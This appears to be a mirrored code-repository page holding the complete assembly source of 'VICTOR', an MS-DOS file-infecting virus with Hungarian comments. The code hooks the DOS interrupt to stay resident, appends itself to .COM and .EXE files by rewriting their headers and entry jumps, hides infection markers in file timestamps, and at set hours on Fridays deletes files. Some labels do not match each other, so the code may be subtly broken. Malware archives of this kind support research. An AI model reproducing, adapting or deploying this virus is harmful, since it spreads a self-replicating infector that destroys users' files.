Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.victor.err
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

889 lines
28 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;************************************************
;* *
;* VICTOR V.1.0 *
;* The incredible high performance virus *
;* Length #98A bytes *
;* *
;************************************************
;
; 6 = bunteto sys file's time
; 8 = bunteto sys file's date
; 3f = Loaded .EXE header E... offset SS
; 41 = value SP
; 43 = chksum
; 45 = value IP
; 47 = offset CS
; 49 = SS init addr (relative to 0)
; 4B = SP init addr
; 4F = .EXE start point ofs (relative to 0)
; 51 = .EXE start point seg
; 53 = .exe size$ - header length
; 59 = .EXE file logikai merete /felkerekitve egy $ al, $ hatar/
; 5B = --""--
; 5D = .exe size length mod 512
; 5F = .exe size length div 512
; 61 = Loaded .EXE header length $ mod 512
; 63 = PSP seg
; 65 = psp seg
; 72 = ido tarolohely hi=sec, lo=1/100 sec
; B 74 = jelzo a bunteto rendszerben talalt file 1=COM,0=EXE
; 75 = a bunteto rendszerben a talalt file attributuma
; 77 = DOS fatal error ofs
; 79 = DOS fatal error seg
; 7B = DTA ofs
; 7D = DTA seg
; 7F = PSP seg
; B 81 = A sajat file f9=.EXE/f8=.COM (default)
; 82 = INT_21 ofs
; 84 = INT_21 seg
; 86 = az FFFF funkciora dos-tol visszakapott ertek
; 88 = seg PSP:100 / PSP
; 8C = env-en beluli offset sajat nev
; 8E = SS save area
; 90 = SP save area
; 92
; | Parameter Block for Load
; 9E
; B A2 = INT_21 second
; B A3 = INT_21 minute
; A4 = INT_21 SS save
; A6 = INT_21 SP save
; A8 = flag 1=child process in action 0=foprocess
; A9 = INT_21 original AX
; B B1 = idopont flag Pentek 9,11,13,15 idopontokban 1 /0
; B B2 = day of week (0=sun ... 6=sat)
; B BA = f8 (default .COM file) f9=exe
;
XSEG SEGMENT
ASSUME CS:XSEG
XPROC PROC FAR
CALL L00B4 ;eloszor egy jmp x-el a virus indul el
db ?,?,? ;a program elso 3 byte-ja
db ? dup (?) ;adatterulet
L00B4: POP SI
SUB SI,3
CLI
CLD
CLC
JC L00EB
PUSH SI
ADD SI,3
CLD
MOV DI,100H ;restauracio
MOVSW
MOVSB
POP SI
MOV AX,CS
MOV BX,AX
MOV CL,4
SHR SI,CL
ADD AX,SI ;ax=virus kezdet szegmens
PUSH AX
MOV AX,0D8H
PUSH AX
DB 0CBH ;RETF
;cont...
MOV CS:[7FH],BX ;eredeti PSP addr
MOV CS:[63H],BX
MOV AX,CS
MOV DS,AX
MOV ES,AX ;atteres a virus szegmensre
JMP L010A
;L00EB:
; MOV CS:[0063H],DS
; MOV AX,CS
; MOV DS,AX
; MOV ES,AX
; MOV AX,WORD PTR DS:[0063H]
; ADD AX,0010H
; MOV WORD PTR DS:[0065H],AX
; MOV SI,003FH
; MOV DI,0049H
; MOV CX,0005H
; MOVSW
;
;
; A virus ellenorzi a DOS verziot, ha ez nem megfelelo _exec.
; Ha a virus meg nincs a memoriaban _copy0
; Ha mar bent van _exec
;
L010A: MOV AL,DS:[00BAH]
MOV DS:[0081H],AL
MOV AH,30H ;DOS version
INT 21H
CMP AL,3
JZ vers_ok
MOV CX,0FEC1H
MOV DS:[0086H],CX
JMP _exec
vers_ok:MOV AX,0FFFFH ;Mar a memoriaban van ?
MOV BX,0FF0H
INT 21H
MOV DS:[0086H],CX
CMP CX,0FEC1H
JNZ _copy0
JMP _exec
;
; _copy0: a virus elhelyezese a memoriaban
;
; A virus meg nincs a memoriaban.
; Megkeresi a saja nevet a kesobbieknek es megnezi hogy sajat maga elerheto-e.
; A memoriablokkja elejere masolja a virust .COM, es .EXE file-oknak
; megfeleloen. Ezek utan _exec.
;
_copy0:
PUSH ES
MOV AX,DS:[063H] ;A program ENV-je
MOV ES,AX
MOV AX,ES:[02CH]
MOV DS:[8AH],AX
PUSH DS
MOV AX,DS:[8AH]
MOV DS,AX
MOV ES,AX
XOR DI,DI
MOV AL,1
MOV CX,01F4H
REPNE SCASB
INC DI
POP DS
POP ES
MOV DS:[8CH],DI ;Sajat fertozott programom neve
PUSH DS
MOV DX,DI
MOV AX,DS:[008AH]
MOV DS,AX
MOV AX,3D00H ;Open File = Sajat magam
INT 21H
POP DS
JNC L0175
MOV DS:[86H],0FEC1H
JMP _exec
L0175: MOV BX,AX ;Close File
MOV AH,3EH
INT 21H
CMP BYTE PTR DS:[081H],0F9H
JZ exe_file ;Az exe-t 0-ra kell masolni
MOV AX,DS:[007FH]
MOV DS:[0065],AX
MOV ES,AX
ADD AX,0010H
MOV WORD PTR DS:[0088H],AX ;ES=PSP:100
XOR SI,SI
MOV DI,0100H ;eddig a virus a mem vegen volt
MOV CX,098AH ;Atmasolja a virust PSP:100 ra
REP MOVSB
PUSH AX
MOV AX,01B7H
PUSH AX
DB 0CBH ;A vezerles a PSP:100 ban!!! to:1
;
; .EXE program eseten nem kell lehet 100H ra tenni.
;
exe_file:
MOV AX,DS:[0065H] ;normal psp:
MOV ES,AX
MOV DS:[0088H],AX
XOR SI,SI
XOR DI,DI
MOV CX,098AH ;A virus szegmensbol a psp: re
REP MOVSB ; atmasolja a virust.
PUSH AX
MOV AX,01B7H
PUSH AX
DB 0CBH; RETF
; cont from 1
;
; _exec: blow/install/run_original
;
; 1. Esetleges kartekonykodas.
; 2. a, Ha a virus mar a memoriaban van, lefuttatja az
; eredeti programot. /ez a tarban van, csupan a vezerlest kell raadni./
; b, Ha meg nincs a memoriaban, akkor atveszi a rendszertol
; a vezerlest. /ezutan barmilyen DOS fn-kerelmet ellenorizhet, vagy
; tetszese szerint hatasaban megvaltoztathat./ Ennel a megvalositasnal
; a virus felulirta a betoltott programot, hogy a memoriablokk tetejen
; lehessen. Igy kenytelen a dos program betolto-lefuttato funkciojat
; hasznalni, hogy lefuttassa a programot. A vezerlest visszakapva magat
; rezidensse teszi magat, es kilep a DOS-ba /KEEP funkcio./
;
; /a hasznalata elott szukseges _copy0, ha meg nem rezidens a virus./
;
;
MOV AX,CS ;cs=psp:100
MOV DS,AX
MOV ES,AX
MOV SS,AX
MOV SP,08F3H
_exec: MOV AH,2CH ;Get Time
INT 21H
MOV DS:[0072H],DX ;seconds/hundredths
MOV AH,2CH
INT 21H
MOV CL,DL
AND CL,0FH
ROL DS:[0072H],CL
TEST WORD PTR DS:[0072H],1 ;Veletlen esemeny
JE L01E2
JMP L01E5
L01E2: CALL _working ;???? kartekonykodhat...
L01E5: CMP WORD PTR DS:[86H],0FEC1H;Meg nincs installalva de _copy0 volt
JNZ _inst
JMP run_prg ;a program tarban van, ugorj ra!
_inst: MOV DX,DS:[0088H] ;seg(PSP:100) - PSP = 10
SUB DX,DS:[0065H]
MOV BX,098AH ;Virus length in paragraphs
MOV CL,04H
SHR BX,CL
INC BX
ADD DX,BX
ADD DX,10H
MOV DS:[00A0H],DX
PUSH ES
MOV ES,DS:[0063H] ;A sajat memoriablokkom merete csokken,
MOV BX,DS:[00A0H] ; pont annyi lesz, ahova befer a virus
MOV AX,4A00H ; PSP vel egyutt meg + $10
INT 21H ;/mivel bemasoltuk, ez ott van/
POP ES
PUSH ES
MOV AX,3521H ;Get INT_21 vector
INT 21H
MOV DS:[0082H],BX
MOV DS:[0084H],ES
POP ES
MOV DX,06B3H ;Set INT_21 vector
MOV AX,2521H
INT 21H
MOV BYTE PTR DS:[00A8H],1 ;=child process flag
PUSH ES ;Prepare for Load/Exec self
PUSH DS
MOV DS:[008EH],SS
MOV DS:[0090H],SP
MOV AX,WORD PTR DS:[008AH] ;Az L/E egy uj memoriablokkot hoz
MOV WORD PTR DS:[0092H],AX ;letre /a virusprogram felett/
MOV AX,WORD PTR DS:[0063H] ;exitnel csak az altala lefoglalt
MOV WORD PTR DS:[0096H],AX ;blokk szabadul fel, a virus bent
MOV WORD PTR DS:[009AH],AX ;marad tovabbra is.
MOV WORD PTR DS:[009EH],AX
MOV BX,0092H
MOV DX,DS:[008CH]
MOV AX,WORD PTR DS:[008AH]
MOV DS,AX
MOV AX,4B00H
INT 21H
MOV AX,WORD PTR CS:[008EH] ;A kilepeskor felszabadult a futtato
MOV SS,AX ;blokk, es visszakaptam a vezerlest.
MOV SP,CS:[0090H]
POP DS
POP ES
MOV BYTE PTR DS:[00A8H],0 ;Process flag
MOV DX,DS:[00A0H]
MOV AX,3100H ;Terminate process and remain resident
INT 21H ;(KEEP)
; Akkor hajtodik vegre, ha a virus mar bent van a memoriaban
run_prg:
CMP BYTE PTR CS:[81H],0F8H ;.COM program
JNZ run_exe
JMP run_com
run_exe:MOV DX,DS:[0065H] ;PSP
ADD DS:[0051H],DX ;Inditasi szegmens
MOV AX,WORD PTR DS:[0049H] ;SS relative
ADD AX,DX ;Setup Stack
MOV SS,AX
MOV SP,DS:[004BH]
MOV AX,WORD PTR DS:[0063H] ;Default PSP
MOV DS,AX
MOV ES,AX
STI
JMP DWORD PTR CS:[004FH] ;EXE Start point
; .COM program kornyezet beallitas, es lefuttatas PSP:100
run_com:MOV AX,WORD PTR DS:[007FH] ;Default PSP
MOV DS,AX
MOV ES,AX
STI
PUSH AX
MOV AX,0100H
PUSH AX
DB 0CBH; RETF
;
; Kartekony: letorol egy par file-t, vagy fertoz
;
_working:
MOV CX,DS:[0072H] ;Veletlen kezdoertek 1..4 ciklus
AND CX,3
INC CX
delet: PUSH CX
CALL L02C5
POP CX
LOOP delet
DB 0C3H; RET
;
L02C5: MOV AH,2AH ;Get Date
INT 21H
MOV DS:[00B2H],AL ;Day of Week
PUSH ES
MOV AH,2FH ;Get DTA
INT 21H
MOV DS:[007BH],BX
MOV DS:[007DH],ES
POP ES
MOV DX,0014H ;Set DTA
MOV AH,1AH
INT 21H
PUSH ES
MOV AX,3524H ;Get Dos Fatal Error vector
INT 21H
MOV DS:[0077H],BX
MOV DS:[0079H],ES
POP ES
MOV DX,00B3H
MOV AX,2524H ;Set Fatal Error to : IRET
INT 21H
MOV CX,0FFE3H
MOV DX,000AH ;Search for first :*.*
MOV AH,4EH
INT 21H
JNC _kezd
JMP io_err ; reset DTA, fatal error, RET
_kezd: MOV AH,2CH ;Set randomizer
INT 21H
MOV DS:[0072H],DX
MOV AH,2CH
INT 21H
MOV CL,DL
AND CL,0FH
ROL DS:[0072H],CL
MOV AH,2CH ;Get Time
INT 21H
XOR DS:[0072H],DX
MOV BYTE PTR DS:[00B1H],0 ;idopont-flag
CMP BYTE PTR DS:[00B2H],3 ;Milyen nap van?
JNZ no_date
CMP CH,9 ;Pentek 9h,11h,13h,15h-nal
JZ kill ; kimeletlenul letorol fileokat
CMP CH,0BH
JZ kill ;maskor neha megnezi hogy com/exe-e.
CMP CH,0DH
JZ kill
CMP CH,0FH
JNZ no_date
kill: MOV BYTE PTR DS:[00B1H],1 ;A datum megfelelo
no_date:TEST WORD PTR DS:[0072H],30H
JNZ _1
JMP d_next
_1: CMP BYTE PTR DS:[00B1H],1
JNZ look_run
MOV DX,0032H ;Megfelel az idopont, es sajnos...
MOV CX,0020H
MOV AX,4301H
INT 21H ;change file mode to normal
JNB _del
JMP io_err
_del: MOV DX,0032H ;UNLINK file
MOV AH,41H
INT 21H
JMP io_err
;
; Ha futtathato .COM v .EXE a talalt file akkor megfertozi ha meg nincs,
; egyebkent keres egy masik file-t. /1 lehetoseget ad/
;
look_run:
MOV DI,0032H ;A penteki kritikus idon kivul
XOR AL,AL ;akar fertozhet is
MOV CX,003FH
REPNE SCASB
SUB DI,+04H
MOV BP,DI
MOV SI,DI
MOV CX,0003H ;ez egy .COM volt ???
MOV DI,000EH
REPE CMPSB
JZ _dcom
MOV SI,BP
MOV CX,0003H ;vagy egy .EXE ???
MOV DI,0011H
CMPSB
JZ _dexe
JMP d_next ;nem futtathato file, ujat
_dcom: MOV BYTE PTR DS:[0074H],1
JMP _d
_dexe: MOV BYTE PTR DS:[0074H],0
_d: MOV DX,0032H ;Get file attr
MOV AX,4300H
INT 21H
JNB _2
JMP io_err
_2: MOV DS:[0075H],CX
MOV DX,0032H ;Set normal attr
MOV CX,0020H
MOV AX,4301H
INT 21H
JNC L03CD
JMP io_err
L03CD: MOV DX,0032H ;Open file
MOV AX,3D02H
INT 21H
JNB L03DA
JMP io_err
L03DA: MOV BX,AX
MOV AX,5700H ;Get file date/time
INT 21H ;a fertozott fileok ideje oszthato 8-al
JNB _3
JMP io_err
_3: MOV DS:[0006H],CX
MOV DS:[0008H],DX
TEST CX,0007H
JZ dft_ok
JMP fertoz ;ha nem oszthato 8-al, nincs fertozve
dft_ok: TEST WORD PTR DS:[72H],43H ;meg bizonytalankodik
JZ d_mehet
JMP d_clnxt
d_mehet:MOV CX,0FFFFH ;LSEEK EOF - 6
MOV DX,0FFFAH
MOV AX,4202H
INT 21H
JNB dls_ok
JMP io_err
dls_ok: MOV CX,0006H ;Read file's last 6 byte
MOV DX,00ABH
MOV AH,3FH
INT 21H
JNC drd_ok
JMP io_err
drd_ok: MOV CX,0003H ;megegyezik valamivel
MOV SI,0984H ;/mar fertozott/
MOV DI,00ABH
REPE CMPSW
JZ d_clnxt
JMP fertoz
d_clnxt: ;Close and Next
MOV AH,3EH
INT 21H
JNB d_attrs
JMP io_err
dattrs: MOV CX,DS:[0075H] ;Reset attr
MOV DX,0032H
MOV AX,4301H
INT 21H
JNC d_next
JMP io_err
;
; Probal ujabb file-t keresni
;
d_next: TEST WORD PTR DS:[0072H],2CH ;meg egy lehetosege van
JNZ _dsnext
JMP io_err
_dsnext:MOV AH,4FH
INT 21H
JNC _dnxtok
JMP io_err
_dnxtok:JMP _kezd
;
; A fertozott file jellemzoi: /.COM v .EXE /
;
; Csak olyan file-okat fertoz meg melyek hossza nagyobb a virusenal.
; A tul nagy .COM fileokat nem bantja.
; File ido oszthato 8-al
; File vegen levo virus azonosito (6 byte ea80492502. )
;
fertoz: XOR CX,CX
XOR DX,DX
MOV AX,4202H ;LSEEK eof
INT 21H
JNC _4
JMP io_err
_4: AND DX,DX
JNZ d_selct
CMP AX,098AH ;csak a virusnal nagyobbak jok
JNC d_selct
JMP d_clnxt
d_selct:CMP BYTE PTR DS:[0074H],1
JNZ df_exe
JMP df_com
;
; .EXE file megfertozese
;
; 1. Beolvassa a File hosszat mod 512 (+2) es a tobbi informaciot
; 2. A file vegere /size felkerekitett $, $ hatar/ felirja a virus-testet
; 3. Kiszamitja a kod hosszat = eredeti_file_size$ - header_size ,
; es ez lesz erteke az uj +SS,+CS nek, IP=0.
; /az eredeti exe kod moge, pont a virusra mutat/
; 4. Felirja az uj Header informaciot.
; 5. Megallapitja az uj filehossz div,mod 512-t
; 6. Felirja a headerbe (+2)
; 7. Visszaallitja a file-idot (div 8) es a file attributumot
;
df_exe:
MOV BYTE PTR CS:[BAH],0F9H ;.EXE file
XOR CX,CX
MOV DX,0008H
MOV AX,4200H ;LSEEK 8: Size of header $
INT 21H
JNB _5
JMP io_err
_5: MOV CX,0002H ;READ Size of header mod 512
MOV DX,0061H
MOV AH,3FH
INT 21H
JNC _6
JMP io_err
_6: XOR CX,CX ;LSEEK E: Offset of SS
MOV DX,000EH
MOV AX,4200H
INT 21H
JNC _7
JMP io_err
_7: MOV CX,000AH ;Read header information
MOV DX,003FH
MOV AH,3FH
INT 21H
JNC _8
JMP io_err
_8: XOR CX,CX
XOR DX,DX
MOV AX,4202H ;LSEEK eof
INT 21H
JNB _9
JMP io_err
_9: MOV CX,DX
MOV DX,AX ;a meret felkerekitve egy $-al
ADD DX,+10H ;mindig $ hatar
ADC CX,+00H
AND DX,-10H
MOV AX,4200H
INT 21H ;Elmegy a file vegere /maga szerint/
JNB _10
JMP io_err
_10: MOV DS:[005BH],DX
MOV DS:[0059H],AX
MOV CX,098AH
XOR DX,DX ;Felirja a virus-testet
MOV AH,40H
INT 21H
JNB L0501
JMP io_err
L0501: CMP AX,CX
JE L0508
JMP io_err
L0508: MOV DX,DS:[005BH] ;size HI max. 000x x=0..f hexad.
MOV CL,0CH
SHL DX,CL
MOV AX,DS:[0059H] ;size LO
MOV CL,04H
SHR AX,CL
OR DX,AX
SUB DX,DS:[0061H]
MOV DS:[005BH],DX ;size $ - header_length = code_length$
MOV DS:[0053H],DX
MOV WORD PTR DS:[0059H],0
XOR CX,CX
MOV DX,000EH ;LSEEK E:
MOV AX,4200H
INT 21H
JNB L053A
JMP io_err
L053A: MOV CX,000AH ;WRITE UP new Header Info
MOV DX,0053H ;
MOV AH,40H ; new SS ofs = file moge mutat
INT 21H ; new IP = 0
JNB L0549 ; new CS ofs = file moge mutat
JMP io_err
NOP
L0549: XOR CX,CX ;LSEEK EOF
XOR DX,DX
MOV AX,4202H
INT 21H
JNB L0557
JMP io_err
NOP
L0557: ADD AX,01FFH ;Totalsize = exesize + virus
ADC DX,0 ;felkerekiti 512-re
MOV DH,DL
MOV DL,AH ;DX= DL AH
XOR AH,AH
SHR DX,1 ; ez lesz a hanyados
ADC AH,0
MOV WORD PTR DS:[005DH],AX ; 256/0 maradek
MOV DS:[005FH],DX
XOR CX,CX ;LSEEK 2: size mod 512
MOV DX,0002H
MOV AX,4200H
INT 21H
JNB L057E
JMP io_err
NOP
L057E: MOV CX,0004H ;WRITE up size mod 512
MOV DX,005DH ; size div 512
MOV AH,40H
INT 21H
JNB L058D
JMP SHORT io_err
NOP
L058D: MOV CX,DS:[0006H] ;Set Original file time
MOV DX,DS:[0008H] ;kiveve time oszthato 8-al
AND CX,-08H
MOV AX,5701H
INT 21H
JNB L05A2
JMP SHORT io_err
NOP
L05A2: MOV AH,3EH ;Close
INT 21H
JNB L05AB
JMP SHORT io_err
NOP
L05AB: MOV CX,DS:[0075H] ;Reset attr
MOV DX,0032H
MOV AX,4301H
INT 21H
JMP io_err
;
; I/O error
;
io_err: PUSH DS
MOV DX,DS:[007BH]
MOV AX,DS:[007DH]
MOV DS,AX ;Reset DTA
MOV AH,1AH
INT 21H
POP DS
PUSH DS
MOV DX,DS:[0077H]
MOV AX,DS:[0079H] ;Reset Fatal Error vector
MOV DS,AX
MOV AX,2524H
INT 21H
POP DS
DB 0C3H; RET
;
; A .COM file megfertozese:
;
; 1. Ellenorzi, hogy nem lesz-e tul nagy a .COM file a virussal egyutt.
; 2. Eltarolja adatteruletere a file elso 3 byte-jat /ezt fogja kicserelni/
; 3. A file vege utan /felkerekiti egy $-al,mindig $-hatar/ felirja a
; virus-testet.
; 4. A file elejere felirja a JMP v_start utasitast. v_start = filesize + 3
; 5. Visszaallitja a file-idot azon modositassal, hogy mindig oszthato 8-al
; /ez egy jel amirol gyorsabban ismerheti fel a mar fertozott prg-kat/,
; es az eredeti file-attributumot.
;
df_com:
MOV BYTE PTR CS:[BAH],0F8H ;.COM file
XOR DX,DX
XOR CX,CX
MOV AX,4202H ;LSEEK EOF
INT 21H
JNB _c1
JMP SHORT io_err
_c1: MOV CX,0FC80H ;nem tul nagy-e a file (max 64K COM)
SUB CX,098AH
CMP AX,CX
JB _csoz
JMP d_clnxt
_csok: XOR DX,DX
XOR CX,CX
MOV AX,4200H ;LSEEK START
INT 21H
JNB _crd3
JMP SHORT io_err
_crd3: MOV CX,0003H ;READ FILE'S FIRST 3 byte
MOV DX,0003H ;(ezt fogja lecserelni az ugrasra)
MOV AH,3FH ;ds:3 ra azaz a virustestbe
INT 21H
JNB _crdok
JMP SHORT io_err
_crdok: CMP AX,CX
JZ _crdok1
JMP SHORT io_err
_crdok1:XOR CX,CX ;LSEEK EOF
XOR DX,DX
MOV AX,4202H
INT 21H
JNC _cls1ok
JMP io_err
_cls1ok:MOV BP,AX ; (size + 10h) AND -10h =
ADD BP,+10H
AND BP,-10H ; felkerekiti egy $-al a size-t
XOR CX,CX
MOV DX,BP
MOV AX,4200H ; es elmegy ide /over EOF/
INT 21H
JNB _covr
JMP io_err
_covr: MOV CX,098AH ;WRITE felirja a virustestet
XOR DX,DX
MOV AH,40H
INT 21H
JNB _cwrok
JMP io_err
_cwrok: CMP AX,CX
JZ _cwr1ok
JMP io_err
_cwrok1:XOR DX,DX ;LSEEK START
XOR CX,CX
MOV AX,4200H
INT 21H
JNB L0664
JMP io_err
L0664: MOV BYTE PTR DS:[0003H],0E9H
SUB BP,+03H ;WRITE jmp virus (size+3)
MOV DS:[0004H],BP
MOV CX,0003H
MOV DX,0003H
MOV AH,40H
INT 21H
JNB L067F
JMP io_err
L067F: CMP AX,CX
JE L0686
JMP io_err
L0686: MOV CX,DS:[0006H] ;Set file Date/Time
MOV DX,DS:[0008H] ;A FERTOZOTT FILE IDEJE OSZTHATO 8-AL
AND CX,-08H ;CX = xxxxx000
MOV AX,5701H
INT 21H
JNB L069B
JMP io_err
L069B: MOV AH,3EH ;Close file
INT 21H
JNB L06A4
JMP io_err
L06A4: MOV CX,DS:[0075H] ;Set original file attr
MOV DX,0032H
MOV AX,4301H
INT 21H
JMP io_err ;befejezodott a fertozes
;*******************************
;* *
;* A rezidens INT_21 funkcio *
;* *
;*******************************
CMP AX,0FFFFH ;virus funkcio: install_stat
JNE L06C2
CMP BX,0FF0H
JNE L06C2
MOV CX,0FEC1H ;visszaadja az install-kodot
IRET
L06C2: CMP AH,3EH ;CLOSE
JE L0710
CMP AH,41H ;UNLINK
JE L0710
CMP AH,3CH ;CREAT
JE L0710
CMP AH,42H ;LSEEK
JE L0710
CMP AH,43H ;CHMOD
JE L0710
CMP AH,4BH ;L/E
JE L0710
CMP AH,4EH ;FFIRST
JE L0710
CMP AH,4FH ;FNEXT
JE L0710
CMP AH,5BH ;CREATE
JE L0710
CMP AH,39H ;MKDIR
JE L0710
CMP AH,3AH ;RMDIR
JE L0710
CMP AH,3BH ;CHDIR
JE L0710
CMP AH,3DH ;OPEN
JE L0710
CMP AH,3FH ;READ
JE L0710
CMP AH,40H ;WRITE except BX=1 stdout
JE L0710
JMP jmp_dos
L0710:
CMP BYTE PTR CS:[00A8H],1 ;Ha Child processben vagyunk
JNE L071B ;mindent beken kell hagyni...
JMP jmp_dos
L071B: CMP AH,40H ;FN = WRITE, handle=1 (print)
JNE L0728 ; nem bantja
CMP BX,+01H
JNE L0728
JMP jmp_dos ;to dos
L0728:
MOV CS:[00A9H],AX
MOV CS:[00A4H],SS
MOV CS:[00A6H],SP
MOV AX,CS
MOV SS,AX
MOV SP,08F3H
PUSH ES
PUSH DS
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
MOV AX,CS
MOV DS,AX
MOV ES,AX
PUSH DS
MOV DX,DS:[0082H]
MOV AX,DS:[0084H]
MOV DS,AX
MOV AX,2521H ;Visszaallitja az eredeti
INT 21H ; DOS hivas lehetoseget
POP DS ; a rutinon belul
NOP
NOP
NOP
NOP
MOV AH,2CH ;Randomize
INT 21H
MOV DS:[0072H],DX
MOV AH,2CH
INT 21H
MOV CL,DL
AND CL,0FH
ROL DS:[0072H],CL
MOV AH,2CH
INT 21H
XOR DS:[0072H],DX
MOV AH,2CH
INT 21H
CMP CL,DS:[00A3H]
JZ L0792
MOV DS:[00A3H],CL ;min
MOV DS:[00A2H],DH ;sec
JMP do_it
NOP
L0792: MOV BL,DS:[00A2H] ;felorankent kozbelep
ADD BL,30
CMP DH,BL
JC _vDOS
MOV DS:[00A2H],DH
do_it: CALL _working
vDOS: MOV DX,06B3H ;visszaallitja onmagat DOS-nak
MOV AX,2521H
INT 21H
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP DS
POP ES
MOV AX,WORD PTR CS:[00A4H]
MOV SS,AX
MOV SP,CS:[00A6H]
MOV AX,WORD PTR CS:[00A9H]
jmp_dos
JMP DWORD PTR CS:[0082H] ;Exec DOS fn
db 'The incredible anyad'
XPROC ENDP
XSEG ENDS
END

View Git Blame Copy Permalink